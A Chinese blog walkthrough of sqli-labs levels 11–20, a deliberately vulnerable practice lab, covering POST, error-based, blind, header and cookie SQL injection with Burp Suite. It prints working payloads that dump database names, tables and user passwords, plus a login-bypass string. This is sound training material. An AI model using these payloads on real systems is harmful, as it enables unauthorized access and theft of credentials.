sqli-labs闯关之11-20关

Posted 2021-03-11 escwq

不管是第几关，我们的最终目标是获得用户密码，从而获取最高权限！

11到21关的提交方式全是post型的，我这里使用burpsuit抓包软件，也可以用hackbar选中的post，下面的实验我们穿插的使用（用hackbar的时候我们的注释符号用#，不能用--+,因为--+会出错）

第十一关

 

从这一关开始，我们就进入到了POST注入的世界了。在接下来的几关中我们将陆续介绍关于POST注入的方法以及技巧。

 

post是一种数据提交方式，它主要是指数据从客户端提交到服务器端

首先我们发现他是单引号字符型注入

 

 判断它有几个显示位，（看来是两个）

 

 接下来我们使用  联合查询语句 union select 来进行爆破，使用union select的时候要注意，输入的unname必须是一个不存在的，，否则将会输出不出来

 

 

 首先获取数据库使用者  名称权限，版本

 

获取我们要爆破的数据库名

获得该数据库中的表名

 

获得列名，因为我们没有指定数据库，所以他把所有数据库里面的users表的列名全都列出来，，

加上and table_schema=database()就可以指定该数据库，注意users旁边要加引号，不加会出错

 

 获得用户名密码

 

第十二关（注入格式将十一关的\'换成 "） 就行）

和第十一关一样，就是把单引号闭合换成双引号变形闭合就可以啦  \'     ——>    ")

 

 

 

第十三关

发现输入完正确的输入后，他不给我们回显出来，说明这关是盲注了，就又和第五关一样了，参考第五关。通过这关的名字我们可以判断是单引号变形，就是‘）进行闭合

 Double Injection- String- with twist（双注入 - 字符型 - 变形）

 

 

 

 

既然它返回错误信息了，说明有回显，可以报错注入。

样例payload，，获得数据库名

 

在concat()中构造查询语句，

爆数据库名，版本，用户， ， ，有多少组用户密码，用户和密码

 1 uname= \') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= \') or 1=1 # &submit=Submit
 2 
 3 uname= \') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= \') or 1=1 # &submit=Submit
 4 
 5 
 6 uname= \') union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= \') or 1=1 # &submit=Submit
 7 
 8 uname= \') union select 1,2 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= \') or 1=1 # &submit=Submit
 9 
10 uname= \') union select 1,2 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name=\'users\' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= \') or 1=1 # &submit=Submit
11 
12 uname= \') union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= \') or 1=1 # &submit=Submit
13 
14 uname= \') union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= \') or 1=1 # &submit=Submit

最后获得用户名和密码

 （中间还可以用布尔型手工注入，正确会回显，错误不回显）

（第五关基本一样，不再赘述）不会的可以看我上一篇文章很清晰的讲述了如何到这步

 

第十四关

和第十三关基本一样就是把单引号变形  变成  双引号，过程不再赘述，最后获得用户名和密码

这里用的布尔型手工注入，正确会回显，错误不回显（我这只截图了一种方法，共有三种方法）

 

 

 

 

第十五关

这关题目是说时间延迟单引号盲注，那咱就用时间延迟吧，但是其实用上一关的布尔盲注也是完全可以的

 

 获取用户密码

 

 

 

 

第十六关

和第十五关基本一样，区别就是把单引号闭合变成了双引好括号闭合，没有回显位，用时间盲注

时间盲注获得用户名

 

 布尔盲注得密码（证明两种方法都可以解题）

 

 还有一种更快的方法，我们大费周章就是为了获得用户名密码。这种方法又叫做万能密码，就是我们即使不输入密码，用户名只要写成admin")#   这样的形式就可以进去

 

 

第十七关

这关有点意思啦，我上来先用万能密码尝试发现不能，经过单引号，双引号以及变形，发现不管怎么样都没有得出我们想要的结果

后来通过查网页和看php文件，我发现这关对username做了很严格的过滤，对各种引号括号进行了转义，判断。但是它没有对password进行过滤，所有我们来对password进行爆破

我不经意间发现，这一关好像对密码没有进行验证，只要你用户名对，密码是什么他都可以进去

这关我试了试好像不能进行布尔盲注和时间盲注，可以试试报错型注入

使用updatexml（），它和extractvaule（）是亲兄弟、

获取版本（可有可无，就是为了验证这个方法是否可行）

 

 获得库名

 

 获得表名

 

 获得列名

 

 获取字段使用报，，错性注入会出现错误（出现这个错误You can\'t specify target table \'users\' for update in FROM clause）

错误的意思是说，不能先select出同一表中的某些值，再update这个表(在同一语句中)

 

 对于这个问题，，可以采用双层 select（），

 

 

第十八关

这关是 基于报错注入,上一关没有对password进行过滤，这关就进行过滤了，那怎么办呢？

这关我们就要用burp抓包神器了（注意把浏览器设置成代理模式，抓包的网站不要用localhost，因为我试了试发现不能）

把浏览器设置为代理，，设置手动代理时，，将端口设置为8080

 

 

 Burp中设置，前面的勾一定要有，不然无法监听

 

之后，开着burp，，，再去浏览器随便点下Submit或者执行就行。

浏览器就会，一直处于刷新状态    说明抓包成功

 

 我们先输入一个admin，admin，，把包放回

 

这样把包放回后，，，右得重新设置代理，抓包，太麻烦

我们直接把抓来的代码全选，，发送到repeater，这样咱们就不用在浏览器上一直输入了，方便快捷

 

我们把这句话换成我们想要的查询语句就可以了（使用extractvalue进行）和第12关的语句基本一样

获得数据库名

 

 go完之后就可以直接在Burp上查看啦

 

还是那个地方，，把语句换成

\'and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) and \'

获得数据库表

 

 

换成：\'and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=\'users\' and table_schema=database()),0x7e)) and \'

获得数据库列名

 

获得用户名密码（这里只显示了一部分密码，当然可以用not in来看其他的密码）

\'and extractvalue(1,concat(0x7e,(select group_concat(username,\'~\',password)from users),0x7e)) and\'

 

 

第十九关

这一关一进去输入账户密码就发现有一个Referer的东西，我猜就是改变它的值，事实确实如此，和上一关基本一样就是把agent换成了referer

代理，抓包，修改headers中的User-Agent（十八关中修改的部分），获得库名……获得用户名和密码，又是重复性动作了，和上一关语句都一样，我就不截图那么多了

 

第二十关

进来先输入用户名密码，测试一下，发现是关于cookie值的进行注入，那我们就在这里注入

 

同样的设置代理，抓包，，抓包后发送到repeater：

 

 在上图划线部分注入，

改cookie：uname=admin\'，报错，说明存在注入漏洞

 

 还是那老一套，看加不加单引号，怎么闭合，有几个显示位。

查看列数：uname=\' order by 4 # （注意闭合sql语句）

判断回显位置：uname=\'union select 1,2,3#            最后发现是单引号闭合，有三个显示位

爆库名

 

表名，列名，都和第一关的payload一样

表名和列名的语句

1 uname=-giao\' union select 1,13,(select group_concat(table_name)from information_schema.tables where table_schema=\'security\')--+
2 
3 uname=-giao\' union select 1,13,(select group_concat(column_name)from information_schema.columns where table_name=\'users\')#

 

爆信息

11-20结束